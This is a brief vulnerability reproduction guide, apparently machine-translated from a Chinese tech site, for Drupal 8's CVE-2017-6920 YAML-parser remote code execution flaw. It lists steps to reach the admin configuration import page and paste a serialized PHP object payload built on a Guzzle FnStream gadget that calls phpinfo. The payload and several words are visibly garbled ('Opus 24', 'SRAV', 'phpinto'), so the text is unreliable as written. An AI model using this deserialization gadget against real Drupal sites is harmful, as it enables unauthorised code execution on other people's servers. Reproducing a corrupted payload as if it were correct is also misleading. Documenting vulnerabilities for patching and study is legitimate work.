Shulou(Shulou.com)06/01 Report--

Vulnerability background:

On June 21, 2017, Drupal officially released a vulnerability numbered CVE-2017- 6920 and its impact is Critical. This is a remote code execution vulnerability caused by improper handling of Drupal Core's YAML parser, affecting 8.x Drupal Core.

Recurrence of vulnerabilities:

1. Open the web page and log in to an administrator account first.

two。 Visit http:// your ip:8080/admin/config/development/configuration/single/import

3. Then fill in the second one as shown in the following picture.

Opus 24:\ "GuzzleHttp\ Psr7\ FnStream\": 2: {SRAV 33:\ "\" 0GuzzleHttp\ Psr7\ FnStream\ 0methods\ "; ASV 1: {SRAV 5:\" close\ "; SRAV 7:\" phpinfo\ ";} SRAV 9:\" _ fn_close\ "; sRV 7:\" phpinfo\ ";}"

4. Then execute the bottom import, and another phpinto will come out to represent it.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.